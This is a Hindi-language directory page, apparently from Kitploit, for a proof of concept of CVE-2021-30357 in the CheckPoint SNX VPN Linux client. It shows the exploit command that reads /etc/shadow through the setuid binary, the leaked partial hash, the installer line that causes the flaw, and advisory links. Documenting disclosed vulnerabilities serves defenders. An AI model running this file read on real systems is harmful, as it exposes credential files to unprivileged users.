Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-30357_CheckPoint_SNX_VPN_PoC — CheckPoint SNX VPN Linux Client के माध्यम से विशेषाधिकार प्राप्त फ़ाइल पढ़ने के लिए प्रूफ-ऑफ-कॉन्सेप्ट | Kitploit
उपकरण/GitHubGitHub/joaovarelas/cve-2021-30357_checkpoint_snx_vpn_poc
विशेषाधिकार वृद्धिभेद्यता स्कैनरभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंग
GitHubjoaovarelas/cve-2021-30357_checkpoint_snx_vpn_poc

CVE-2021-30357_CheckPoint_SNX_VPN_PoC

CheckPoint SNX VPN Linux Client के माध्यम से विशेषाधिकार प्राप्त फ़ाइल पढ़ने के लिए प्रूफ-ऑफ-कॉन्सेप्ट

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
61123 साल पहलेअभी तक समीक्षित नहीं

CVE-2021-30357_CheckPoint_SNX_VPN_प्रूफ-ऑफ-कॉन्सेप्ट

CheckPoint SNX VPN Linux क्लाइंट के माध्यम से विशेषाधिकार प्राप्त फ़ाइल पढ़ने के लिए प्रूफ-ऑफ-कॉन्सेप्ट।

प्रभावित संस्करण

  • CheckPointVPN_SNX_Linux_800007075.sh
  • MD5 चेकसम: 4372e9936e2dfb1d1ebcef3ed4dd7787

एक्सप्लॉइट

शोषण के लिए बस -f पैरामीटर का उपयोग करके किसी भी फ़ाइल को SNX कॉन्फ़िग के रूप में लोड करें। यदि फ़ाइल मान्य SNX कॉन्फ़िग नहीं है, तो यह एक त्रुटि फेंकेगा और सिंटैक्स त्रुटि प्रदर्शित करेगा, जिससे स्ट्रिंग टर्मिनेटर मिलने तक सामग्री लीक हो जाएगी (उदाहरण: etc/shadow):

root@kitploit:~
$ /usr/bin/snx -f /etc/shadow

parsing of the file: /etc/shadow  failed: Line 1: unknown attribute 'root:$6$Mi[REDACTED]VwUSrc2ioKt.2Mex.yF.:18624:0:99999:7:::'

Valid attributes are:

   - server          SNX server to connet to
   - sslport         The SNX SSL port (if not default)
   - username        the user name

(...)

भेद्यता

इसका कारण यह है कि निष्पादन योग्य /usr/bin/snx में SETUID बिट सेट है और यह सुपर-यूज़र के रूप में चलता है, जो इंस्टॉलेशन के दौरान सेट किया जाता है।

विशेष रूप से, .sh इंस्टॉलेशन फ़ाइल (CheckPointVPN_SNX_Linux_800007075.sh) में परिभाषित वेरिएबल COMMAND_TO_RUN:

root@kitploit:~
[...]
COMMAND_TO_RUN="install --owner=root --group=root --mode=u=rxs,g=x,o=x snx /usr/bin/snx; install --owner=root --group=root --mode=u=rx,g=rx,o=rx snx_uninstall.sh /usr/bin/snx_uninstall; install --directory --owner=root --group=root --mode=u=rwx /etc/snx; install --directory --owner=root --group=root --mode=u=rwx /etc/snx/tmp"

पैरामीटर --mode=u=rxs में, अंतिम s SUID बिट सेट करता है, जिससे निष्पादन योग्य बाइनरी रूट के रूप में चलती है।

आधिकारिक सलाह

  • https://support.checkpoint.com/results/sk/sk173513
  • https://vrls.ws/posts/2021/06/cve-2021-30357-check-point-software-vpn-arbitrary-file-read/
टूल डाउनलोड करें